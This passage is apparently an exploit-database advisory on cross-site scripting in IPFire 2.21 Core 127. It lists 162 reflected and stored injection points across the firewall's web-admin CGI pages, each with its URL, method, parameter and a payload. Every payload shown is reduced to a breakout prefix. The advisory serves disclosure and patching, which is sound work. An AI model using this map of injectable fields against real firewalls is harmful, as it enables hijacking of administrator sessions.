127 | Cross-Site Scripting +# Date: 08.02.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://www.ipfire.org +# Software Link: +https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso +# Version: IPFire 2.21 - Core Update 127 +################################################################################################################################## + +Introduction +IPFire is a Linux distribution that focusses on easy setup, good handling +and high level of security. It is operated via an intuitive web-based +interface which offers many configuration options for beginning and +experienced system administrators. IPFire is maintained by developers who +are concerned about security and who update the product regularly to keep +it secure. IPFire ships with a custom package manager called Pakfire and +the system can be expanded with various add-ons. + + +################################################################################# + +XSS details: Reflected & Stored + +################################################################################# + +XSS1 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_mailsender + +PAYLOAD +'"> + +################################################################################# + +XSS2 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_recipient + +PAYLOAD +'> + +################################################################################# + +XSS3 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_mailserver + +PAYLOAD +'> + +################################################################################# + +XSS4 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_mailport + +PAYLOAD +'> + +################################################################################# + +XSS5 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_mailuser + +PAYLOAD +'> + +################################################################################# + +XSS6 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mail.cgi + +METHOD +Post + +PARAMETER +txt_mailpass + +PAYLOAD +'> + +################################################################################# + +XSS7 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +PROXY_PORT + +PAYLOAD +'> + +################################################################################# + +XSS8 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +TRANSPARENT_PORT + +PAYLOAD +'> + +################################################################################# + +XSS9 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +UPSTREAM_PROXY + +PAYLOAD +'> + +################################################################################# + +XSS10 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +UPSTREAM_USER + +PAYLOAD +'> + +################################################################################# + +XSS11 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +UPSTREAM_PASSWORD + +PAYLOAD +'> + +################################################################################# + +XSS12 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +FILEDESCRIPTORS + +PAYLOAD +'> + +################################################################################# + +XSS13 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +CACHE_MEM + +PAYLOAD +'> + +################################################################################# + +XSS14 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +CACHE_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS15 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +MIN_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS16 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +MAX_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS17 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +MAX_INCOMING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS18 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +MAX_OUTGOING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS19 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +AUTH_CHILDREN + +PAYLOAD +'> + +################################################################################# + +XSS20 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +AUTH_CACHE_TTL + +PAYLOAD +'> + +################################################################################# + +XSS21 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +AUTH_ALWAYS_REQUIRED + +PAYLOAD +'> + +################################################################################# + +XSS22 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +DST_NOAUTH + +PAYLOAD +'> + +################################################################################# + +XSS23 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +NCSA_MIN_PASS_LEN + +PAYLOAD +'> + +################################################################################# + +XSS24 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +NCSA_BYPASS_REDIR + +PAYLOAD +'> + +################################################################################# + +XSS25 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_REQUIRED + +PAYLOAD +'> + +################################################################################# + +XSS26 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_TIMEOUT + +PAYLOAD +'> + +################################################################################# + +XSS27 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_HOSTS + +PAYLOAD +'> + +################################################################################# + +XSS28 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_ENABLE_ACL + +PAYLOAD +'> + +################################################################################# + +XSS29 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_USER_ACL + +PAYLOAD +'> + +################################################################################# + +XSS30 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_ALLOW_USERS + +PAYLOAD +'> + +################################################################################# + +XSS31 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +IDENT_DENY_USERS + +PAYLOAD +'> + +################################################################################# + +XSS32 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +LDAP_TYPE + +PAYLOAD +'> + +################################################################################# + +XSS33 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +LDAP_PORT + +PAYLOAD +'> + +################################################################################# + +XSS34 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +RADIUS_PORT + +PAYLOAD +'> + +################################################################################# + +XSS35 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +RADIUS_ENABLE_ACL + +PAYLOAD +'> + +################################################################################# + +XSS36 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +RADIUS_USER_ACL + +PAYLOAD +'> + +################################################################################# + +XSS37 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +RADIUS_ALLOW_USERS + +PAYLOAD +'> + +################################################################################# + +XSS38 | Stored + +URL +https://192.168.2.200:444/cgi-bin/proxy.cgi + +METHOD +Post + +PARAMETER +RADIUS_DENY_USERS + +PAYLOAD +'> + +################################################################################# + +XSS39 | Stored + +URL +https://192.168.2.200:444/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +REDIRECT_PAGE + +PAYLOAD +'> + +################################################################################# + +XSS40 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +BE_BLACKLIST + +PAYLOAD +'> + +################################################################################# + +XSS41 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/updatexlrator.cgi + +METHOD +Post + +PARAMETER +MAX_DISK_USAGE + +PAYLOAD +'> + +################################################################################# + +XSS42 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/updatexlrator.cgi + +METHOD +Post + +PARAMETER +MAX_DOWNLOAD_RATE + +PAYLOAD +'> + +################################################################################# + +XSS43 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +START_ADDR_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS44 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +END_ADDR_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS45 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +DEFAULT_LEASE_TIME_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS46 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +MAX_LEASE_TIME_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS47 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +DOMAIN_NAME_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS48 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +DNS1_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS49 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +DNS2_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS50 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +NTP1_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS51 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +NTP2_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS52 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +WINS1_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS53 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +WINS2_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS54 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +NEXT_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS55 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FILE_GREEN + +PAYLOAD +'> + +################################################################################# + +XSS56 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +ADVOPT_DATA + +PAYLOAD +'> + +################################################################################# + +XSS57 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +KEY1 + +PAYLOAD +'> + +################################################################################# + +XSS58 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_MAC + +PAYLOAD +'> + +################################################################################# + +XSS59 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_ADDR + +PAYLOAD +'> + +################################################################################# + +XSS60 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_REMARK + +PAYLOAD +'> + +################################################################################# + +XSS61 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_NEXTADDR + +PAYLOAD +'> + +################################################################################# + +XSS62 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_FILENAME + +PAYLOAD +'> + +################################################################################# + +XSS63 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +FIX_ROOTPATH + +PAYLOAD +'> + +################################################################################# + +XSS64 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dhcp.cgi + +METHOD +Post + +PARAMETER +KEY2 + +PAYLOAD +'> + +################################################################################# + +XSS65 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/captive.cgi + +METHOD +Post + +PARAMETER +TITLE + +PAYLOAD +"> + +################################################################################# + +XSS66 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/captive.cgi + +METHOD +Post + +PARAMETER +COLOR + +PAYLOAD +"> + +################################################################################# + +XSS67 | Stored + +URL +https://192.168.2.200:444/cgi-bin/connscheduler.cgi + +METHOD +Post + +PARAMETER +ACTION_HOUR + +PAYLOAD + + +################################################################################# + +XSS68 | Stored + +URL +https://192.168.2.200:444/cgi-bin/connscheduler.cgi + +METHOD +Post + +PARAMETER +ACTION_MINUTE + +PAYLOAD + + +################################################################################# + +XSS69 | Stored + +URL +https://192.168.2.200:444/cgi-bin/connscheduler.cgi + +METHOD +Post + +PARAMETER +ACTION_DAYSTART + +PAYLOAD + + +################################################################################# + +XSS70 | Stored + +URL +https://192.168.2.200:444/cgi-bin/connscheduler.cgi + +METHOD +Post + +PARAMETER +ACTION_DAYEND + +PAYLOAD + + +################################################################################# + +XSS71 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/hosts.cgi + +METHOD +Post + +PARAMETER +KEY1 + +PAYLOAD +'> + +################################################################################# + +XSS72 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/hosts.cgi + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS73 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/hosts.cgi + +METHOD +Post + +PARAMETER +HOST + +PAYLOAD +'> + +################################################################################# + +XSS74 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/hosts.cgi + +METHOD +Post + +PARAMETER +DOM + +PAYLOAD +'> + +################################################################################# + +XSS75 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dns.cgi + +METHOD +Post + +PARAMETER +DNS0 + +PAYLOAD +"> + +################################################################################# + +XSS76 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dns.cgi + +METHOD +Post + +PARAMETER +DNS1 + +PAYLOAD +"> + +################################################################################# + +XSS77 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dnsforward.cgi + +METHOD +Post + +PARAMETER +ZONE + +PAYLOAD +"> + +################################################################################# + +XSS78 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/dnsforward.cgi + +METHOD +Post + +PARAMETER +FORWARD_SERVERS + +PAYLOAD +'> + +################################################################################# + +XSS79 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/routing.cgi + +METHOD +Post + +PARAMETER +KEY1 + +PAYLOAD +'> + +################################################################################# + +XSS80 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/routing.cgi + +METHOD +Post + +PARAMETER +GATEWAY + +PAYLOAD +'> + +################################################################################# + +XSS81 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/routing.cgi + +METHOD +Post + +PARAMETER +REMARK + +PAYLOAD +'> + +################################################################################# + +XSS82 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mac.cgi + +METHOD +Post + +PARAMETER +MAC + +PAYLOAD +'> + +################################################################################# + +XSS83 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mac.cgi + +METHOD +Post + +PARAMETER +MAC1 + +PAYLOAD +'> + +################################################################################# + +XSS84 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/mac.cgi + +METHOD +Post + +PARAMETER +MAC2 + +PAYLOAD +'> + +################################################################################# + +XSS85 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/wakeonlan.cgi + +METHOD +Post + +PARAMETER +CLIENT_MAC + +PAYLOAD +'> + +################################################################################# + +XSS86 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/wakeonlan.cgi + +METHOD +Post + +PARAMETER +CLIENT_COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS87 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +TYPE + +PAYLOAD +'> + +################################################################################# + +XSS88 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +IKE_VERSION + +PAYLOAD +'> + +################################################################################# + +XSS89 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +IKE_ENCRYPTION + +PAYLOAD +'> + +################################################################################# + +XSS90 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +IKE_INTEGRITY + +PAYLOAD +'> + +################################################################################# + +XSS91 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +IKE_GROUPTYPE + +PAYLOAD +'> + +################################################################################# + +XSS92 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +IKE_LIFETIME + +PAYLOAD +'> + +################################################################################# + +XSS93 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ESP_ENCRYPTION + +PAYLOAD +'> + +################################################################################# + +XSS94 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ESP_INTEGRITY + +PAYLOAD +'> + +################################################################################# + +XSS95 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ESP_GROUPTYPE + +PAYLOAD +'"> + +################################################################################# + +XSS96 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ESP_KEYLIFE + +PAYLOAD +'> + +################################################################################# + +XSS97 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +COMPRESSION + +PAYLOAD +'> + +################################################################################# + +XSS98 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ONLY_PROPOSED + +PAYLOAD +'> + +################################################################################# + +XSS99 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +PFS + +PAYLOAD +'> + +################################################################################# + +XSS100 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +DPD_ACTION + +PAYLOAD +'> + +################################################################################# + +XSS101 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +DPD_DELAY + +PAYLOAD +'> + +################################################################################# + +XSS102 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +DPD_TIMEOUT + +PAYLOAD +'> + +################################################################################# + +XSS103 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +FORCE_MOBIKE + +PAYLOAD +'> + +################################################################################# + +XSS104 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +NAME + +PAYLOAD +'> + +################################################################################# + +XSS105 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +LOCAL_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS106 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +REMOTE + +PAYLOAD +'> + +################################################################################# + +XSS107 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +LOCAL_ID + +PAYLOAD +'> + +################################################################################# + +XSS108 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +REMOTE_ID + +PAYLOAD +'> + +################################################################################# + +XSS109 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +PSK + +PAYLOAD +'> + +################################################################################# + +XSS110 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_ORGANIZATION + +PAYLOAD +'> + +################################################################################# + +XSS111 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS112 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_EMAIL + +PAYLOAD +'> + +################################################################################# + +XSS113 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_OU + +PAYLOAD +'> + +################################################################################# + +XSS114 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_CITY + +PAYLOAD +'> + +################################################################################# + +XSS115 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +ROOTCERT_STATE + +PAYLOAD +'> + +################################################################################# + +XSS116 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +SUBJECTALTNAME + +PAYLOAD +'> + +################################################################################# + +XSS117 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/vpnmain.cgi + +METHOD +Post + +PARAMETER +P12_PASS + +PAYLOAD +'> + +################################################################################# + +XSS118 | Stored + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +VPN_IP + +PAYLOAD +'> + +################################################################################# + +XSS119 | Stored + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +DMTU + +PAYLOAD +'> + +################################################################################# + +XSS120 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +ccdname + +PAYLOAD +'> + +################################################################################# + +XSS121 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +ccdsubnet + +PAYLOAD +'> + +################################################################################# + +XSS122 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +DOVPN_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS123 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +DHCP_DOMAIN + +PAYLOAD +'> + +################################################################################# + +XSS124 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +DHCP_DNS + +PAYLOAD +'> + +################################################################################# + +XSS125 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +DHCP_WINS + +PAYLOAD +'> + +################################################################################# + +XSS126 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +ROUTES_PUSH + +PAYLOAD +'> + +################################################################################# + +XSS127 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +FRAGMENT + +PAYLOAD +'> + +################################################################################# + +XSS128 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +KEEPALIVE_1 + +PAYLOAD +'> + +################################################################################# + +XSS129 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ovpnmain.cgi + +METHOD +Post + +PARAMETER +KEEPALIVE_2 + +PAYLOAD +'> + +################################################################################# + +XSS130 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ddns.cgi + +METHOD +Post + +PARAMETER +ID + +PAYLOAD +'> + +################################################################################# + +XSS131 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ddns.cgi + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS132 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ddns.cgi + +METHOD +Post + +PARAMETER +LOGIN + +PAYLOAD +'> + +################################################################################# + +XSS133 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ddns.cgi + +METHOD +Post + +PARAMETER +PASSWORD + +PAYLOAD +'> + +################################################################################# + +XSS134 | Stored + +URL +https://192.168.2.200:444/cgi-bin/time.cgi + +METHOD +Post + +PARAMETER +NTP_ADDR_1 + +PAYLOAD +'> + +################################################################################# + +XSS135 | Stored + +URL +https://192.168.2.200:444/cgi-bin/time.cgi + +METHOD +Post + +PARAMETER +NTP_ADDR_2 + +PAYLOAD +'> + +################################################################################# + +XSS136 | Stored + +URL +https://192.168.2.200:444/cgi-bin/time.cgi + +METHOD +Post + +PARAMETER +UPDATE_VALUE + +PAYLOAD +'> + +################################################################################# + +XSS137 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/ids.cgi + +METHOD +Post + +PARAMETER +OINKCODE + +PAYLOAD +'> + +################################################################################# + +XSS138 | Stored + +URL +https://192.168.2.200:444/cgi-bin/extrahd.cgi + +METHOD +Post + +PARAMETER +FS + +PAYLOAD +'> + +################################################################################# + +XSS139 | Stored + +URL +https://192.168.2.200:444/cgi-bin/extrahd.cgi + +METHOD +Post + +PARAMETER +PATH + +PAYLOAD +'> + +################################################################################# + +XSS140 | Stored + +URL +https://192.168.2.200:444/cgi-bin/extrahd.cgi + +METHOD +Post + +PARAMETER +UUID + +PAYLOAD +'> + +################################################################################# + +XSS141 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/firewall.cgi + +METHOD +Post + +PARAMETER +src_addr + +PAYLOAD +'> + +################################################################################# + +XSS142 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/firewall.cgi + +METHOD +Post + +PARAMETER +tgt_addr + +PAYLOAD +'> + +################################################################################# + +XSS143 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/firewall.cgi + +METHOD +Post + +PARAMETER +SRC_PORT + +PAYLOAD +'> + +################################################################################# + +XSS144 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/firewall.cgi + +METHOD +Post + +PARAMETER +TGT_PORT + +PAYLOAD +'"> + +################################################################################# + +XSS145 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/firewall.cgi + +METHOD +Post + +PARAMETER +ruleremark + +PAYLOAD +'> + +################################################################################# + +XSS146 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS147 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS148 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS149 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +NETREMARK + +PAYLOAD +'> + +################################################################################# + +XSS150 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +HOSTREMARK + +PAYLOAD +'> + +################################################################################# + +XSS151 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +newhost + +PAYLOAD +'> + +################################################################################# + +XSS152 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +grp_name + +PAYLOAD +'> + +################################################################################# + +XSS153 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +remark + +PAYLOAD +'> + +################################################################################# + +XSS154 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRV_NAME + +PAYLOAD +'> + +################################################################################# + +XSS155 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRV_PORT + +PAYLOAD +'> + +################################################################################# + +XSS156 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRVGRP_NAME + +PAYLOAD +'> + +################################################################################# + +XSS157 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRVGRP_REMARK + +PAYLOAD +'> + +################################################################################# + +XSS158 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +updatesrvgrp + +PAYLOAD +'> + +################################################################################# + +XSS159 | Stored + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/config.dat + +METHOD +Post + +PARAMETER +ENABLE_REMOTELOG + +PAYLOAD +'> + +################################################################################# + +XSS160 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +FILTER + +PAYLOAD +'> + +################################################################################# + +XSS161 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogip.dat + +METHOD +Post + +PARAMETER +pienumber + +PAYLOAD +'> + +################################################################################# + +XSS162 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogport.dat + +METHOD +Post + +PARAMETER +pienumber + 